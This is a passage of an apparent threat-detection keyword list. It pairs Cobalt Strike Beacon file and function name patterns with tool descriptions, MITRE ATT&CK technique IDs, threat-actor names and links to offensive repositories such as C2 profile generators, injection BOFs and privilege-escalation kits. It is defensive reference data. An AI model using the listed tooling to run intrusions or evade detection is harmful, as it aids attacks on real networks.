T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.x64.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*beacon.x86*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.x86*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_api.h*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,0,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*beacon_bottom *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Beacon_Com_Struct*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_command_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_command_detail*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_command_detail*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*beacon_command_register*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*beacon_command_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_commands*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_compatibility.c*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*beacon_compatibility.h*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*beacon_elevator_describe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus 
- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_elevator_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_elevator_register*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 
- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*beacon_elevator_register*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_elevator_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_elevators*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_elevators*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 